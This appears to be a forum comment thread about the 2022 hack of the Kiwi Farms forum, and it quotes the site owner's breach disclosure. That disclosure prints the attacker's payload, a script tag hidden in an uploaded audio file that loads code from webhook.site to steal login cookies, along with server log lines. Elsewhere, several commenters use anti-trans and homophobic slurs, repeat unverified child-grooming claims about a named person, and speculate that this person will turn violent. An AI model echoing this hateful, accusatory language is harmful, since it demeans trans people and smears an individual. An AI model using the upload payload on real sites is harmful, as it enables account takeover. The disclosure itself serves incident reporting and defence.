all 33 comments

[–][deleted] 27 insightful - 4 fun27 insightful - 3 fun28 insightful - 4 fun -  (20 children)

😨😨😨😨😨

Those troons are going way too far....

[–]Datachost 22 insightful - 2 fun22 insightful - 1 fun23 insightful - 2 fun -  (5 children)

It's insane, all because they refused to back down on archiving what Keffals did. There's no actual proof they were the ones who doxed Keffals, the information for that seems to have come from a different site. The weird Unionist threat against him came from a weird Unionist, not KF, apparently someone had told this guy that Keffals and a friend had been cutting down Union Jacks in the area and replacing them with trans flags.

Are the regular users of KF slightly obsessive arseholes? Sure, there's no law against being a slightly obsessive arsehole though.

[–]ClassroomPast6178 13 insightful - 2 fun13 insightful - 1 fun14 insightful - 2 fun -  (3 children)

apparently someone had told this guy that Keffals and a friend had been cutting down Union Jacks in the area and replacing them with trans flags.

Seems like a weirdly suicidal thing to do in NI, second only in the “I want to die painfully” stakes to cutting down the tricolour.

[–]Datachost 10 insightful - 1 fun10 insightful - 0 fun11 insightful - 1 fun -  (2 children)

Yeah, considering Keffals is staying with a local I'd like to believe even they aren't dumb enough to do that. Which shows you how weird the bloke is who sent the death threat, that he actually thought that was a believable rumour

[–]ClassroomPast6178 8 insightful - 1 fun8 insightful - 0 fun9 insightful - 1 fun -  (0 children)

There are people that are basically clockwork. You wind them up and watch them do something ridiculously stupid. I had a friend like that at school, he was a nightmare to deal with because other people knew that they could provoke him into extreme violence with the most ridiculously made up stories, needless to say he’s been in court a few times now.

[–]OuroborosTheory 3 insightful - 1 fun3 insightful - 0 fun4 insightful - 1 fun -  (0 children)

[–]FlyingKangaroo 3 insightful - 1 fun3 insightful - 0 fun4 insightful - 1 fun -  (0 children)

Agree. For others to see: archived thread of Keffals on KF: https://archive.ph/lWQ0v

Back when I was lurking there I didn’t go to Keffals’ thread so I didn’t know who it is, beside just knowing it’s some “big lolcow”. The section in the 1st post titled “Child grooming” (next one “The Catboy Ranch”) is especially interesting, as of course Wikipedia will never tell you about these accusations. https://en.wikipedia.org/wiki/Keffals

[–]FlyingKangaroo 14 insightful - 3 fun14 insightful - 2 fun15 insightful - 3 fun -  (7 children)

This is awful... KF is already “hidden” to everyone who doesn’t know how to access it or isn’t interested in looking for it/who didn’t have an account there, why do this?

[–]brimshaeBased Woodchipper Merchant 13 insightful - 1 fun13 insightful - 0 fun14 insightful - 1 fun -  (0 children)

Because we're not allowed to call out child predators anymore.

[–][deleted] 11 insightful - 2 fun11 insightful - 1 fun12 insightful - 2 fun -  (1 child)

I also would like to know that.... Also, how did those troons even managed to attack the TOR Network?

[–]FlyingKangaroo 7 insightful - 1 fun7 insightful - 0 fun8 insightful - 1 fun -  (0 children)

After all I assume some of them know how to access TOR sites (sometimes certainly for a dark purposes... heh), so? The answer is always someone’s tech skills. Too bad they’re wasted by such degenerates.

[–][deleted]  (2 children)

[deleted]

    [–]Datachost 12 insightful - 2 fun12 insightful - 1 fun13 insightful - 2 fun -  (1 child)

    At this point you could just about team up with ISIS

    Unlikely. Even ISIS get to have a twitter account.

    [–]Dzonatan 6 insightful - 1 fun6 insightful - 0 fun7 insightful - 1 fun -  (0 children)

    Keffals caused a Streisand Effect with his every move and is too arrogant to change his approach.

    A subset of spectators have a "oh really?" approach and don't take things at face value. What do I mean by this? Here's some examples:

    Keffals proclaims that KF is a den of nazis. Someone goes "oh really? I want to check it out and see for myself".

    Keffals proclaims that KF is down. Someone goes "oh really? I'll go check it out and see if it's really down".

    Keffals proclaims that KF is using TOR. Someone goes "oh really? What's TOR in the first place? I'll go check it out".

    Shame doesn't work on curious people and the longer it goes the more people start paying attention. There's only one thing Null needs to do. Keep being stubborn and bring site back up over and over and over again. Eventually Keffals will lose his paitiance and do something so drastic that not even troon status will protect him from jail time.

    In his latest update Null had to go for a week. Before that there were some murmurs about his family problems and some mention about his family being threatened. That sounds to me like Keffals is on the verge of madness and is just logistics away from grabbing a knife and going to his country.

    [–][deleted]  (2 children)

    [deleted]

      [–][deleted] 6 insightful - 4 fun6 insightful - 3 fun7 insightful - 4 fun -  (1 child)

      Lmao So these troons wasted money on some amateur hacker? Good, served those fags right. Now they have much less money for their estrogen shots, lol🤡🤡🤡

      [–]deusex 6 insightful - 1 fun6 insightful - 0 fun7 insightful - 1 fun -  (1 child)

      This is cyberterrorism. Simple as.

      [–]handbananasrevenge 4 insightful - 1 fun4 insightful - 0 fun5 insightful - 1 fun -  (0 children)

      Cyberterrorism cheered on by social terrorists.

      [–]FlyingKangaroo 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 1 fun -  (0 children)

      On such topics it’s also good to know that they also attacked lolcow.farm in the past, posting very disgusting illegal materials there... Discussion about the topic here: https://lolcow.farm/meta/res/44601.html#q44601

      [–][deleted] 20 insightful - 1 fun20 insightful - 0 fun21 insightful - 1 fun -  (6 children)

      That explains why I couldn't get on today I guess. I hope they don't come for saidit next. Whenever a space exists for people who aren't SJWs now it seems like it either gets compromised or destroyed. I just want to talk to like minded people instead of militant leftists. I'd be fine with them staying on sites for that if there were sites for other people to maybe vent or joke or talk about it, especially because I live in Canada and it is hard to find people my age who are not obsessed with bring up race or gender or something about how weapons are bad but complain when women need to be cautious on their own because they might get assaulted, we can't have even pepper spray and men can get assaulted too but apparently having any self defense that isn't your own body is the only way.

      I can't talk about this stuff in real life. Plus the transgender ideology has really gotten big here. It targets a lot of mentally ill young women here, I almost believed it when I was like 14 because I was really insecure and lonely cause I didn't like makeup (Only cause I felt like it was like lying and I wanted to be pretty without it) so I got caught up in their forums and since I had no free time or anyone to say "Hey, that stuff is not right, you are a teenager and just figuring stuff out" I read the subreddits and almost ended up socially coming out and asking my therapist about being transgender, but thankfully she brushed it off and so did my parents and I got over it a year or two later, thank god. I realized it was all a bunch of nonsense when I met my older cousin one day. She was going by male pronouns but she wasn't on any hormones, she was autistic and she kept saying things like dissociating like me, a 14 year old girl knew what it even meant, she was nice and stuff but she seemed really unwell. It freaked me out honestly, I realized I didn't want to end up like she did, I know that is really rude but she was really off.

      I cannot say any of that to anyone in real life, I need somewhere online or something, just so I can blow off some steam from this sjw stuff in my own life, it is everywhere and people have places if they are sjws but they can't stand when we want to just have something to ourselves.

      Sorry for ranting, I know it isn't a big deal but I don't know anyone my age in real life who isn't super left wing now. I know I sound dramatic and it isn't the end of the world (not literally I guess) but I just want to go on a forum or website without the preachy tones. I'm just a bit disappointed because the internet is getting super boring without dissent. Oh well. I found Kiwifarms to be refreshing compared to most sites now, I am surprised these people can't let go of their obsession with taking it down.

      [–]filbs111 14 insightful - 1 fun14 insightful - 0 fun15 insightful - 1 fun -  (2 children)

      Being a young woman with a brain in Canada must be a pain in the arse. It worked out for Lindsay Shepherd though. Stay the course!

      [–][deleted] 8 insightful - 1 fun8 insightful - 0 fun9 insightful - 1 fun -  (0 children)

      Thank you! I have one good friend in my area but it can get lonely otherwise!

      [–]FlyingKangaroo 5 insightful - 1 fun5 insightful - 0 fun6 insightful - 1 fun -  (0 children)

      Thank God I don’t live in Canada.

      [–][deleted]  (2 children)

      [deleted]

        [–][deleted] 4 insightful - 1 fun4 insightful - 0 fun5 insightful - 1 fun -  (1 child)

        Eh, I don't think I'm a clown for being concerned about this stuff. An idiot maybe but everyone is different I guess.

        [–]Vulptexghost fox girl ^w^ 12 insightful - 1 fun12 insightful - 0 fun13 insightful - 1 fun -  (3 children)

        How would they get their passwords? I would hope it's not stored in plain text.

        [–]IMissPorn 13 insightful - 1 fun13 insightful - 0 fun14 insightful - 1 fun -  (0 children)

        They probably didn't. This announcement is just saying that given the severity of the breach, you should assume it has been compromised and respond accordingly.

        [–]ClassroomPast6178 7 insightful - 1 fun7 insightful - 0 fun8 insightful - 1 fun -  (1 child)

        About ten or fifteen years ago it would be with rainbow tables, but these days you can run hash crackers on GPUs. A couple of breaches over the years allowed the collection of millions of hashed passwords which have now been cracked, so combine the hash cracker software with the database of cracked hashes and, whilst it still isn’t trivial, it’s not rocket science either to reveal passwords. Passwords need to go the way of the dodo, we need a better security solution.

        Have I been pwned is a very useful resource.

        This article is a little out of date, but it explains everything really well.

        [–]ClassroomPast6178 7 insightful - 1 fun7 insightful - 0 fun8 insightful - 1 fun -  (0 children)

        I guess this is why they had so many warnings about Opsec when you signed up to KF, this scenario being the worst case.

        [–]jet199 5 insightful - 4 fun5 insightful - 3 fun6 insightful - 4 fun -  (2 children)

        Your passwords were likely protected because our system can't cope with small data export requests.

        [–][deleted] 6 insightful - 1 fun6 insightful - 0 fun7 insightful - 1 fun -  (0 children)

        It's not a bug, it's a security feature!

        [–]notafed 3 insightful - 1 fun3 insightful - 0 fun4 insightful - 1 fun -  (0 children)

        I use different passwords for every site. I'm not worried about that.

        [–][deleted] 6 insightful - 1 fun6 insightful - 0 fun7 insightful - 1 fun -  (0 children)

        From kiwifarms.net:

        Site Breach

        User Impact Statement

        The forum was hacked. You should assume the following.

        • Assume your password for the Kiwi Farms has been stolen.
        • Assume your email has been leaked.
        • Assume any IP you've used on your Kiwi Farms account in the last month has been leaked.

        Thankfully, most users pay attention to my privacy checkups and there isn't much to leak. You should take a moment to read privacytools.io, even if you hate this site. Use an email address freom a reputable provider. Never use the same password. Use a passphrase with a password manager suggested on PrivacyTools. Use email aliases instead of burner emails so you keep access to your accounts without risking your privacy.

        I do not know for sure if any user information was leaked. In my access logs, they attempted to download all user records at once. This caused an error and no output was returned. I shut everything off soon after. If they scraped information through some other mechanism, I cannot say with any confidence.

        Prognosis

        The site will be restored from a backup point taken at September 17th at Noon GMT.

        This will not happen immediately. I need to reformat and reinstall everything. I need to completely evaluate my security from the top down.

        Cloudflare not only provided DDoS protection, they also accounted for many popular exploits like this. As I've worked for weeks to combat the endless flow of attacks from every conceivable angle I have spread myself very thin and hurridly replaced old systems with new ones that are not properly vetted.

        Even now, the many groups which have organized to terrorize businesses and attack the servers are looking for new opportunities to complicate our situation.

        I am very, very tired of writing statements like this, but I find it difficult the stifle my righteous indignation. Every time I see the reaction of these people, it is this hideous arrogance. I am so filled with utter revulsion at the thought of letting smug, dangerous perverts get away with hiding who they are from the public.

        More than anything, I really miss spending time with you guys and laughing at stupid shit. It is very draining to deal with such miserable people all the time.

        Technical Explanation

        Yesterday, vsys - one of our hosts out of Ukraine - was compromised. I initially believed that this allowed a hacker to take over that webserver and snoop data as a man-in-the-middle. I no longer believe that is the case.

        A bad actor was able to upload a webpage disguised as an audio file to XenForo. Elsewhere, he was able to load this webpage (probably as an inline frame), causing random users to make automated requests and send their authentication cookies off-site, so that the attacker could use it to gain access to their account. My admin account was compromised through this mechanism.

        Once they had access to the ACP, they attempted to download user data, and XenForo provides a way to export user lists with information that is precisely: email, username, last acitivity, register date, user state (banned/unverified), post count, and if they are staff.

        However, their request did not appear to go through because they requested too many records at once. The following record reports a 500 error and no content.

        2a03:e600:100::31 - - [18/Sep/2022:08:16:13 +0000] "GET /admin.php?users/list-export&export=1 HTTP/2.0" 500 0 "https://kiwifarms.st/admin.php?users/list" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0" It's impossible to say if they acquired user data through other means, but I did not see any other attempt to complete this transaction or otherwise scrape user data. The file uploaded was an .opus file that contained a web document that looked like this.

        <!DOCTYPE html>
        <script src=//webhook.site/payload-url> </script>

        I do not know what was in the payload. The webhook site allows for you to redirect to other scripts and to delete request history, which was done. There's no information tied to that page.

        The script caused the user to load /test-chat, my chat shim, /help/, XenForo's help documentation, /avatar/avatar, to change their avatar to the logo of another site (likely as a frame job), and admin.php?tools/phpinfo, if they were an admin.

        The script was uploaded to XenForo directly (as XenForo does not validate media), but injected by my custom Rust-based chat program that interacts with XenForo and borrows sessions.

        x.x.x.x - - [18/Sep/2022:03:03:53 -0400] "GET /data/audio/xxxx/xxxx.opus HTTP/1.1" 200 90 "https://kiwifarms.st/test-chat?style=dark" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 You can find relevant scripts below.

        https://github.com/jaw-sh/ruforo/blob/master/src/bin/xf_chat/main.rs
        https://github.com/jaw-sh/ruforo/blob/master/resources/js/chat.js
        https://github.com/jaw-sh/ruforo/tree/master/src/bbcode

        XenForo removed us from their license a year ago and their software is no longer sufficient for our needs. We needed something custom, but my confidence in my work has been shot.

        The sophistication in this attack is very high, and shows an intimiate familiarity with both Rust and XenForo. It is unfortunate that they have applied themselves to this end, likely for pay.

        There are so many more people trying to destroy than create.

        Take it easy,
        Josh
        jcmoon@pm.me

        P.S. I am still expecting to have to deal with that family emergency. If that happens, I will be gone for a while. Updates will be on t.me/s/kiwifarms.

        [–]sproketboy 2 insightful - 3 fun2 insightful - 2 fun3 insightful - 3 fun -  (1 child)

        r/lolphp

        [–]omegamissingnopneumonoultramicroscopicsilicovolcanoconiosisexualgender 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (0 children)

        wrong site

        [–]FlyingKangaroo 3 insightful - 1 fun3 insightful - 0 fun4 insightful - 1 fun -  (0 children)

        Some current KF discussion from Lolcow.farm: https://lolcow.farm/snow/res/1649200.html#q1649200

        Osaki, the trans wolf, is sending a fake document (containing false allegations of CSAM in the farms) to every domains

        Now that’s something I didn’t know.